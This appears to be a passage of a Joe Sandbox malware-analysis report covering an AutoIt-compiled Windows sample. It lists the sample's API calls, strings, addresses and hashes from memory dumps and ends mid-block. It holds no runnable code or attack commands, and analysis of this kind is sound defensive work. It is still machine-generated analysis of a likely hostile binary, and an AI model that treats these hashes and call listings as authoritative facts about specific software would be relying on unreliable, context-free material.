                                                                    • Instruction Fuzzy Hash: 8A12A230504201DFFB66CF28C984BA9BBE1FF44311F5846AAF995CB292C735E881DB91
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 010474DE
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0104759D
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010475DB
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 010475ED
                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01047633
                                                                    • GetClientRect.USER32(00000000,?), ref: 0104763F
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01047683
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01047692
                                                                    • GetStockObject.GDI32(00000011), ref: 010476A2
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 010476A6
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010476B6
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010476BF
                                                                    • DeleteDC.GDI32(00000000), ref: 010476C8
                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010476F4
                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0104770B
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01047746
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0104775A
                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0104776B
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0104779B
                                                                    • GetStockObject.GDI32(00000011), ref: 010477A6
                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010477B1
                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 010477BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: 0f8d9389b6f94cfcaa86fd81012c050645c92dacdfb329f8faadeb8a5319b52e
                                                                    • Instruction ID: 8ed0947c96259ba1adc5369facb9876a7c88b6e949140ae39929ad91907af914
                                                                    • Opcode Fuzzy Hash: 0f8d9389b6f94cfcaa86fd81012c050645c92dacdfb329f8faadeb8a5319b52e
                                                                    • Instruction Fuzzy Hash: 81A170B1A00205BFEB24DBA5DC5AFAF7BB9EB05710F044155FA54AB2D0C7B9AD00CB64
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0103AD1E
                                                                    • GetDriveTypeW.KERNEL32(?,0105FAC0,?,\\.\,0105F910), ref: 0103ADFB
                                                                    • SetErrorMode.KERNEL32(00000000,0105FAC0,?,\\.\,0105F910), ref: 0103AF59
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: 0ed43d6116b5d06861935c32238b7f00196dcd1ad80196c6183a40caa4820c3c
                                                                    • Instruction ID: 82f427ef86258bc7844bac84841cbb1f03aff96073cf68c902e19b882255e01e
                                                                    • Opcode Fuzzy Hash: 0ed43d6116b5d06861935c32238b7f00196dcd1ad80196c6183a40caa4820c3c
                                                                    • Instruction Fuzzy Hash: 7C51FFB4748205EF8B50FB95C882DBEB7A9EFC8600B94895BE4C3EF2D0D6359901DB51
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-86951937
                                                                    • Opcode ID: f97bd7995758eb9eb9c8d23fc890e25e9eb352fd172a02f3a63cf07222f47fb1
                                                                    • Instruction ID: bf4a30f0ea59163f4c13bcbfe3bc1f77d7574818bb7f48a280028afe6db07749
                                                                    • Opcode Fuzzy Hash: f97bd7995758eb9eb9c8d23fc890e25e9eb352fd172a02f3a63cf07222f47fb1
                                                                    • Instruction Fuzzy Hash: 76815EB16002056ADB11BF25DC52FBF37A9AF04750F084016FE81EA2D2EB74DE05F251
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 01059AD2
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 01059B8B
                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 01059BA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: 0
                                                                    • API String ID: 2326795674-4108050209
                                                                    • Opcode ID: 90c761f730f5ba9e957a9e374ef507c13f06b818dd2442ea47a231f64129aa49
                                                                    • Instruction ID: b3d5d63c19252ea6fc0dbccc880e91ebf4629ca88122107337ab3476ab8f453f
                                                                    • Opcode Fuzzy Hash: 90c761f730f5ba9e957a9e374ef507c13f06b818dd2442ea47a231f64129aa49
                                                                    • Instruction Fuzzy Hash: 9C028B30104301EBEBA58F28C858BABBFE5FF49318F04495DFAD9962A1C779D944CB91
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 0105A903
                                                                    • SetTextColor.GDI32(?,?), ref: 0105A907
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0105A91D
                                                                    • GetSysColor.USER32(0000000F), ref: 0105A928
                                                                    • CreateSolidBrush.GDI32(?), ref: 0105A92D
                                                                    • GetSysColor.USER32(00000011), ref: 0105A945
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0105A953
                                                                    • SelectObject.GDI32(?,00000000), ref: 0105A964
                                                                    • SetBkColor.GDI32(?,00000000), ref: 0105A96D
                                                                    • SelectObject.GDI32(?,?), ref: 0105A97A
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0105A999
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0105A9B0
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0105A9C5
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0105A9ED
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0105AA14
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0105AA32
                                                                    • DrawFocusRect.USER32(?,?), ref: 0105AA3D
                                                                    • GetSysColor.USER32(00000011), ref: 0105AA4B
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0105AA53
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0105AA67
                                                                    • SelectObject.GDI32(?,0105A5FA), ref: 0105AA7E
                                                                    • DeleteObject.GDI32(?), ref: 0105AA89
                                                                    • SelectObject.GDI32(?,?), ref: 0105AA8F
                                                                    • DeleteObject.GDI32(?), ref: 0105AA94
                                                                    • SetTextColor.GDI32(?,?), ref: 0105AA9A
                                                                    • SetBkColor.GDI32(?,?), ref: 0105AAA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1996641542-0
                                                                    • Opcode ID: b91bce64e7d69925c1451b7b469d45ebc403d611fe8c49dc946727e9ac4c4554
                                                                    • Instruction ID: b5b6cc9782e14e46c15c96f7e794573cdf399c1c5958a0daddc9f18d68dcec57
                                                                    • Opcode Fuzzy Hash: b91bce64e7d69925c1451b7b469d45ebc403d611fe8c49dc946727e9ac4c4554
                                                                    • Instruction Fuzzy Hash: 92516C75900219EFDF219FA8DC48EAF7BB9FF08320F114615FA51AB291D77A9940CB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01058AC1
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01058AD2
                                                                    • CharNextW.USER32(0000014E), ref: 01058B01
                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01058B42
                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01058B58
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01058B69
                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01058B86
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 01058BD8
                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01058BEE
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01058C1F
                                                                    • _memset.LIBCMT ref: 01058C44
                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01058C8D
                                                                    • _memset.LIBCMT ref: 01058CEC
                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01058D16
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 01058D6E
                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 01058E1B
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 01058E3D
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01058E87
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01058EB4
                                                                    • DrawMenuBar.USER32(?), ref: 01058EC3
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 01058EEB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                    • String ID: 0
                                                                    • API String ID: 1073566785-4108050209
                                                                    • Opcode ID: 05f91aae1e6396f257b2b67d74aaae354a45ae2cf8edcfdaa9bbef71ae35aa6e
                                                                    • Instruction ID: 43432b34ae85f7c3b8917398ea212b2a1ede3509c6795e7b4ac1c8195cedd7f5
                                                                    • Opcode Fuzzy Hash: 05f91aae1e6396f257b2b67d74aaae354a45ae2cf8edcfdaa9bbef71ae35aa6e
                                                                    • Instruction Fuzzy Hash: 73E17470900209EBEF619F65CC88EEF7BB9EF09710F008196FE95AA191D7759680DF60
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 010549CA
                                                                    • GetDesktopWindow.USER32 ref: 010549DF
                                                                    • GetWindowRect.USER32(00000000), ref: 010549E6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 01054A48
                                                                    • DestroyWindow.USER32(?), ref: 01054A74
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01054A9D
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01054ABB
                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01054AE1
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 01054AF6
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01054B09
                                                                    • IsWindowVisible.USER32(?), ref: 01054B29
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01054B44
                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01054B58
                                                                    • GetWindowRect.USER32(?,?), ref: 01054B70
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 01054B96
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 01054BB0
                                                                    • CopyRect.USER32(?,?), ref: 01054BC7
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 01054C32
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: 8c84c527c586dff63dd06f745a9eb20075d9a009b208c482793054f4f36f2070
                                                                    • Instruction ID: aae82d38549bc4f2c0a761e3986b5671d5b055420f0b0b6b9df3f8d3b4a031c5
                                                                    • Opcode Fuzzy Hash: 8c84c527c586dff63dd06f745a9eb20075d9a009b208c482793054f4f36f2070
                                                                    • Instruction Fuzzy Hash: 54B1AA70608341AFDB84DF68C848BABBBE5BF88314F04891DF9D99B291E775E844CB51
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 010344AC
                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 010344D2
                                                                    • _wcscpy.LIBCMT ref: 01034500
                                                                    • _wcscmp.LIBCMT ref: 0103450B
                                                                    • _wcscat.LIBCMT ref: 01034521
                                                                    • _wcsstr.LIBCMT ref: 0103452C
                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01034548
                                                                    • _wcscat.LIBCMT ref: 01034591
                                                                    • _wcscat.LIBCMT ref: 01034598
                                                                    • _wcsncpy.LIBCMT ref: 010345C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 699586101-1459072770
                                                                    • Opcode ID: 66be54bb9a4aca255e29e270b99162f7fc2a278b0798c75e4dbb9bbcdea2f9dc
                                                                    • Instruction ID: 6e2b8c1cadc807a2879f115b99cd5b92e457ed909c81f0d82aeb5e8ece1b164e
                                                                    • Opcode Fuzzy Hash: 66be54bb9a4aca255e29e270b99162f7fc2a278b0798c75e4dbb9bbcdea2f9dc
                                                                    • Instruction Fuzzy Hash: 35414B719002097BDB11BA75CC03EBF37ACEF85310F04005AFA40EA193EF7C9A01A6A9
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FD28BC
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00FD28C4
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FD28EF
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00FD28F7
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00FD291C
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FD2939
                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FD2949
                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FD297C
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FD2990
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00FD29AE
                                                                    • GetStockObject.GDI32(00000011), ref: 00FD29CA
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD29D5
                                                                      • Part of subcall function 00FD2344: GetCursorPos.USER32(?), ref: 00FD2357
                                                                      • Part of subcall function 00FD2344: ScreenToClient.USER32(010957B0,?), ref: 00FD2374
                                                                      • Part of subcall function 00FD2344: GetAsyncKeyState.USER32(00000001), ref: 00FD2399
                                                                      • Part of subcall function 00FD2344: GetAsyncKeyState.USER32(00000002), ref: 00FD23A7
                                                                    • SetTimer.USER32(00000000,00000000,00000028,00FD1256), ref: 00FD29FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: 0c91933a52dd317b729504dee52fd5be6e868ee5182459d48d7c4e7a726f1c02
                                                                    • Instruction ID: 193cec7b25bf11a12b3ba343cc1b25a1c32be235eecea2d3010a39fa0fceab31
                                                                    • Opcode Fuzzy Hash: 0c91933a52dd317b729504dee52fd5be6e868ee5182459d48d7c4e7a726f1c02
                                                                    • Instruction Fuzzy Hash: 9CB1B171A0020ADFEB25DFA8DC55BAE7BB5FB08310F14421AFA55E72D4CB799801DB90
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0102A47A
                                                                    • __swprintf.LIBCMT ref: 0102A51B
                                                                    • _wcscmp.LIBCMT ref: 0102A52E
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0102A583
                                                                    • _wcscmp.LIBCMT ref: 0102A5BF
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0102A5F6
                                                                    • GetDlgCtrlID.USER32(?), ref: 0102A648
                                                                    • GetWindowRect.USER32(?,?), ref: 0102A67E
                                                                    • GetParent.USER32(?), ref: 0102A69C
                                                                    • ScreenToClient.USER32(00000000), ref: 0102A6A3
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0102A71D
                                                                    • _wcscmp.LIBCMT ref: 0102A731
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0102A757
                                                                    • _wcscmp.LIBCMT ref: 0102A76B
                                                                      • Part of subcall function 00FF362C: _iswctype.LIBCMT ref: 00FF3634
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                    • String ID: %s%u
                                                                    • API String ID: 3744389584-679674701
                                                                    • Opcode ID: 5801a399314162c0b17761bf0e67a7917c7e195cd9482007159480a50aeb841c
                                                                    • Instruction ID: cd90b1e8724918efe90a72708a643f9d6e93edbda2de67271a02ec17cec03e75
                                                                    • Opcode Fuzzy Hash: 5801a399314162c0b17761bf0e67a7917c7e195cd9482007159480a50aeb841c
                                                                    • Instruction Fuzzy Hash: F4A1C071304726EBDB15DE68C888BAABBE8FF88314F008519EADAC3551DF34E545CB91
                                                                    APIs
                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0102AF18
                                                                    • _wcscmp.LIBCMT ref: 0102AF29
                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0102AF51
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0102AF6E
                                                                    • _wcscmp.LIBCMT ref: 0102AF8C
                                                                    • _wcsstr.LIBCMT ref: 0102AF9D
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0102AFD5
                                                                    • _wcscmp.LIBCMT ref: 0102AFE5
                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0102B00C
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0102B055
                                                                    • _wcscmp.LIBCMT ref: 0102B065
                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0102B08D
                                                                    • GetWindowRect.USER32(00000004,?), ref: 0102B0F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                    • String ID: @$ThumbnailClass
                                                                    • API String ID: 1788623398-1539354611
                                                                    • Opcode ID: 075b1dfa212ca48f9af199d603efdc387a9d611d72dd0ce10259b63702e15ced
                                                                    • Instruction ID: 517b9529a8a12f1c95df9705dda4f4fa1a0d156fb3970d57235cedf60ed83962
                                                                    • Opcode Fuzzy Hash: 075b1dfa212ca48f9af199d603efdc387a9d611d72dd0ce10259b63702e15ced
                                                                    • Instruction Fuzzy Hash: 9C81E47110431A9FDB51DF18C884FAABBD8FF84314F1884AAFEC58A096DB38D945CB61
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
